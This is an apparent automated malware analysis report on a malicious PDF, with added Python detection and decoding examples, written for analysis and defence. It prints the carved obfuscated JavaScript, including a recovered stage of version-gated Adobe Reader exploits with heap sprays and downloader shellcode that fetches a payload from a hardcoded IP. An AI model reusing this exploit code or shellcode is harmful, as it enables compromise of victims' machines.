Verdict: MALICIOUS
Risk Score: 590

MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 Command and Scripting Interpreter: JavaScript

Malware Insights
The PDF carries embedded JavaScript split across four small /JS objects that rebuild, and then eval, a larger stage hidden in the document's Info dictionary (this.info.Fakerss). The recovered stage targets several known Adobe Reader vulnerabilities, CVE-2009-4324 (media.newPlayer), CVE-2009-0927 (Collab.getIcon) and CVE-2007-5659 (Collab.collectEmailInfo), plus a util.printf field-width overflow path, with the branch selected by Reader version. Each branch heap-sprays the same downloader shellcode, which fetches and executes a second-stage payload from http://91.212.198.34/at_gglo/load.php?spl=pdf_new or http://91.212.198.34/at_gglo/load.php?spl=pdf_pack (the printd copy of the shellcode ends in spl=pdf_new, the util_printf copy in spl=pdf_pack). The combination of a version-gated exploit cluster and hardcoded shellcode download URLs is high-confidence malicious behaviour.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (11 findings)

- media.newPlayer (CVE-2009-4324) [critical; rule CVE_2009_4324; CVE match: exact]: PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(), actively exploited as a zero-day in December 2009. (Identified after JavaScript deobfuscation.)
- Collab.getIcon (CVE-2009-0927) [critical; rule CVE_2009_0927; CVE match: exact]: PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument and allows arbitrary code execution. (Identified after JavaScript deobfuscation.)
- Collab.collectEmailInfo (CVE-2007-5659) [critical; rule CVE_2007_5659; CVE match: exact]: PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(), one of a series of Acrobat JavaScript API exploits. (Identified after JavaScript deobfuscation.)
- Pidief-style multi-CVE JavaScript dispatcher [critical; rule PDF_PIDIEF_MULTI_CVE_DISPATCH; CVE match: likely]: A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Multi-CVE Adobe Reader JavaScript exploit kit [critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT]: One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF selects old Reader vulnerabilities by viewer version and runs heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action [low; rule PDF_JAVASCRIPT; 3 related findings]: The PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]: The PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behaviour.
- PDF JavaScript shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes (each %uXXXX is one UTF-16 code unit, so the two ASCII bytes land in memory low byte first). Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine; this is commodity downloader behaviour rather than a specific Acrobat CVE.
- Embedded JS stream [low; rule PDF_JS]: The PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL. Both URLs below are referenced by PDF JavaScript:
  - http://91.212.198.34/at_gglo/load.php?spl=pdf_new
  - http://91.212.198.34/at_gglo/load.php?spl=pdf_pack
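The correlation that the dispatcher, exploit-kit and exploit-cluster findings describe can be reproduced with a small static check over a recovered JavaScript stage. The Python below is an added example written for this page, not the analyzer's own rule code: it looks for the sink calls the findings name, the app.viewerVersion gate, and the heap-spray idioms visible in the legacy_pdfkit_stage_000.js preview, and combines them the way the findings do. The dispatcher sample is constructed to mirror that stage (its three exploit functions with shortened shellcode, plus the viewerVersion switch the dispatcher finding infers); the benign form sample, the regexes and the verdict labels are this example's own.

```python
import re

# Canonical Adobe Reader JavaScript exploit sinks named in the report's findings.
# The util.printf entry is the field-width format-string path; the report names no CVE for it.
SINK_PATTERNS = {
    "media.newPlayer (CVE-2009-4324)": r"\bmedia\.newPlayer\s*\(",
    "Collab.getIcon (CVE-2009-0927)": r"\bCollab\.getIcon\s*\(",
    "Collab.collectEmailInfo (CVE-2007-5659)": r"\bCollab\.collectEmailInfo\s*\(",
    "util.printf field-width": r"\butil\.printf\s*\(\s*['\"][^'\"]*\d{3,}f['\"]",
}
GATE_PATTERN = r"\bapp\.viewerVersion\b"            # per-version dispatcher
SPRAY_PATTERNS = [                                    # heap-spray idioms seen in the recovered stage
    r"unescape\(\s*['\"](?:%u0[aAcC]0[aAcC])+",        # 0x0c0c / 0x0a0a sled blocks
    r"while\s*\(\s*\w+\.length\s*[<>]=?\s*(?:0x[0-9a-fA-F]+|\d+)\s*\)\s*\w+\s*\+=\s*\w+",  # doubling loop
    r"new\s+Array\s*\(\s*\)",                         # spray array
]
STAGING_PATTERNS = [r"\beval\s*\(", r"\bunescape\s*\(", r"String\.fromCharCode"]


def triage_js(js: str) -> dict:
    """Static triage of one recovered PDF JavaScript stage. Sinks alone are high, a sink plus
    staging is a cluster, and two or more sinks behind an app.viewerVersion gate are the
    multi-CVE dispatcher; plain form JavaScript stays low."""
    sinks = sorted(name for name, pat in SINK_PATTERNS.items() if re.search(pat, js))
    gated = re.search(GATE_PATTERN, js) is not None
    spray = any(re.search(p, js) for p in SPRAY_PATTERNS)
    staging = any(re.search(p, js) for p in STAGING_PATTERNS)
    if len(sinks) >= 2 and gated:
        verdict = "critical: version-gated multi-CVE dispatcher"
    elif sinks and (spray or staging):
        verdict = "critical: exploit cluster (sink plus staging)"
    elif sinks:
        verdict = "high: dangerous Reader API"
    elif staging or spray:
        verdict = "info: staging/obfuscation tokens only"
    else:
        verdict = "low: generic JavaScript"
    return {"sinks": sinks, "gated": gated, "spray": spray, "staging": staging, "verdict": verdict}


# Constructed sample modelled on legacy_pdfkit_stage_000.js: the same three exploit functions
# (shellcode shortened) plus the viewerVersion switch the dispatcher finding infers.
DISPATCHER_SAMPLE = r'''
function printd(){var shellcode=unescape("%uC033%u8B64");var block=unescape("%u0c0c%u0c0c");
while(block.length<=32768)block+=block;memory=new Array();for(i=0;i<0x2000;i++){memory[i]=block+shellcode;}
try{this.media.newPlayer(null);}catch(e){}}
function util_printf(){var num=12999999999999999999888888888888;util.printf("%45000f",num);}
function collab_email(){var msg=unescape("%u0A0A%u0A0A");Collab.collectEmailInfo({msg:msg});}
var v=app.viewerVersion;
if(v<8){collab_email();}else if(v<9){util_printf();}else{printd();}
'''

# Constructed benign form script: a normal util.printf format string, no sinks, no staging.
BENIGN_FORM_SAMPLE = 'var f=this.getField("total");f.value=util.printf("%.2f",f.value*1.2);app.alert("Saved");'

if __name__ == "__main__":
    for label, js in (("dispatcher", DISPATCHER_SAMPLE), ("benign form", BENIGN_FORM_SAMPLE)):
        print(label, triage_js(js))
```

The util.printf pattern deliberately accepts the mangled "E000f" that the recovered stage shows as well as the usual "%45000f": the oversized field width is the signal, not the leading character.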
Extracted artifacts (5)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0032_000.js | pdf-javascript-stream | PDF /JS object 32 at offset 0x3C1 | 156 bytes | 033c92df9f50ee99c879f42bb96a0bdfd5d0b8c05624aa4f808ad7fc75b1d1f8 |
| javascript_obj0034_001.js | pdf-javascript-stream | PDF /JS object 34 at offset 0x492 | 104 bytes | d936163ecd6abb56525d694582a1a0ffdf11ffa5b0ce0fbc5014d4bdc7e6dd0e |
| javascript_obj0036_002.js | pdf-javascript-stream | PDF /JS object 36 at offset 0xE3 | 110 bytes | 74ae1173d76a933e8969f7b6fa2a365df351cf586b7e8048b8708e67181cd0ae |
| javascript_obj0038_003.js | pdf-javascript-stream | PDF /JS object 38 at offset 0x13D4 | 130 bytes | 335649ca23de4fbe06aa2b840fbea3abb7b07dc1c5fb76eddbad1f52cd0e2f2e |
| legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x569 | 6435 bytes | cda1c83c46b664ab69f48b74080e5ca11fe1aca3a39fd9b498faefcc75b30c4e |

javascript_obj0032_000.js
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building tokens).
Preview (first 1,000 lines of the extracted script):

```javascript
var aljbpqLXXfM = 'jOwMTjTcHJN.re';
var ktop = 'r bvb = ev';
var lGq4ChMbh5b = 'gjfj o30444444';
eval('va'+ktop+'al;')
eval('var z = un'+'esca'+'pe;');
```

javascript_obj0034_001.js
Preview (first 1,000 lines of the extracted script):

```javascript
var ru68np5m70Y = 'plac'+'e'+'(/'; var HkOg7wDmIj3 = '%'; var agvhgavsh = '/g,HkOg7wDmIj3)';
```

javascript_obj0036_002.js
Preview (first 1,000 lines of the extracted script):

```javascript
bvb('var bnEq0qYERH9 = ev'+'al;');
bnEq0qYERH9('var jOwMTjTcHJN = this.info'+z("%2e%46%61%6b")+'erss;');
```

javascript_obj0038_003.js
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token).
Preview (first 1,000 lines of the extracted script):

```javascript
var lkaa = aljbpqLXXfM + ru68np5m70Y +lGq4ChMbh5b+ agvhgavsh; var xxx = bnEq0qYERH9(lkaa); var czUcDGvwJ5j = z(unescape(xxx));
```

legacy_pdfkit_stage_000.js
Detection: ClamAV: Js.Exploit.Shellcode-18. Obfuscation or payload: likely (carved artifact contains 12 eval/decoder/string-building tokens and 1 long base64-like blob).
Preview (first 1,000 lines of the extracted script):

```javascript
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;} function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u392F%u2E31%u3132%u2E32%u3931%u2E38%u3433%u612F%u5F74%u6767%u6F6C%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u656E%u0077");var block = unescape("%u0c0c%u0c0c");var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e) {}util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function util_printf(){var 
payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u392F%u2E31%u3132%u2E32%u3931%u2E38%u3433%u612F%u5F74%u6767%u6F6C%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6170%u6B63");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);} function collab_email(){var 
shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u392F%u2E31%u3132%u2E32%u3931%u2E38%u343
```

... (truncated)
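Read in order, objects 32, 34, 36 and 38 assemble the decoder for the stage: object 32 aliases eval and unescape as bvb and z, object 34 supplies the pieces of a replace() call, object 36 builds this.info.Fakerss (z("%2e%46%61%6b") is ".Fak"), and object 38 evaluates jOwMTjTcHJN.replace(/gjfj o30444444/g,HkOg7wDmIj3) with HkOg7wDmIj3 equal to '%' and unescapes the result. So the stage is stored in the document Info dictionary as hex bytes separated by the repeated marker gjfj o30444444, which is what the analyzer's "repeated-marker hex decoded" label refers to. Once the stage is recovered, every %uXXXX shellcode literal in it can be turned into the bytes Reader would hold in memory and searched for the download URL the PDF_JS_SHELLCODE_DOWNLOAD_URL finding describes. The Python below is an added example for this page, not analyzer code: the marker and the shellcode tail are copied from the previews above, the inner stage and the Info value it is wrapped in are constructed stand-ins (the real Fakerss value is not shown in the report), and the helper names are this example's own. Object 38 applies unescape twice; the recovered stage shown above still carries its %uXXXX literals, and that single-pass result is what the example reproduces.

```python
import re

# Marker from the recovered decoder chain: object 38 evals
# "jOwMTjTcHJN.replace(/gjfj o30444444/g,HkOg7wDmIj3)" with HkOg7wDmIj3 = '%'.
MARKER = "gjfj o30444444"

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_UESC = re.compile(r"%u([0-9A-Fa-f]{4})")


def js_unescape(s):
    """Python equivalent of JavaScript unescape(): %XX and %uXXXX each become one code unit."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_marker_stage(info_value, marker=MARKER):
    """Stage 1 of the chain: every marker becomes '%', then the hex string is unescaped."""
    return js_unescape(info_value.replace(marker, "%"))


def marker_encode(js, marker=MARKER):
    """Inverse of decode_marker_stage; used here only to build the constructed sample."""
    return "".join(f"{marker}{b:02x}" for b in js.encode("latin-1"))


def shellcode_bytes(js_literal):
    """Bytes Reader holds in memory for a %uXXXX string: each code unit is stored UTF-16LE,
    so %u7468 becomes 68 74, i.e. 'ht'. This is the little-endian layout the finding describes."""
    return b"".join(int(h, 16).to_bytes(2, "little") for h in _UESC.findall(js_literal))


def extract_urls(blob):
    """Hardcoded fetch URLs: ASCII up to the first non-printable (the sample NUL-terminates its URL)."""
    return [m.decode("ascii") for m in re.findall(rb"https?://[\x21-\x7e]+", blob)]


def printable_strings(blob, min_len=4):
    """strings(1)-style view. x86 push-immediate encodings (0x68 'h' followed by four ASCII bytes)
    leave fragments such as 'hurlm' and 'hon.d': the urlmon.dll name pushed onto the stack in 4-byte pieces."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


# Shellcode tail copied from the printd() function in the legacy_pdfkit_stage_000.js preview.
SHELLCODE_TAIL_NEW = (
    "%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC"
    "%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF"
    "%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u392F%u2E31%u3132%u2E32"
    "%u3931%u2E38%u3433%u612F%u5F74%u6767%u6F6C%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66"
    "%u656E%u0077"
)
# The util_printf() copy differs only in its last code units, which spell spl=pdf_pack instead.
SHELLCODE_TAIL_PACK = SHELLCODE_TAIL_NEW[: -len("%u656E%u0077")] + "%u6170%u6B63"

# Constructed stand-in for the stage stored in this.info.Fakerss (the real value is not in the report).
INNER_STAGE = 'function printd(){var shellcode = unescape("' + SHELLCODE_TAIL_NEW + '");}'
SAMPLE_INFO_VALUE = marker_encode(INNER_STAGE)


def analyse(info_value):
    """Decode the marker-hex stage, then pull URLs and strings out of every %u shellcode literal."""
    stage = decode_marker_stage(info_value)
    urls, strings = [], []
    for lit in re.findall(r'unescape\("((?:%u[0-9A-Fa-f]{4})+)"\)', stage):
        blob = shellcode_bytes(lit)
        urls.extend(extract_urls(blob))
        strings.extend(printable_strings(blob))
    return {"stage": stage, "urls": urls, "strings": strings}


if __name__ == "__main__":
    print(analyse(SAMPLE_INFO_VALUE)["urls"])
    print(extract_urls(shellcode_bytes(SHELLCODE_TAIL_PACK)))
```

On the copied tail, the strings view yields "e.ex", "Phon.dhurlmT" and the full http://91.212.198.34/at_gglo/load.php?spl=pdf_new, which is how the analyzer can report a download URL from shellcode without emulating it: the URL is plain ASCII once the UTF-16 code units are laid out in memory order.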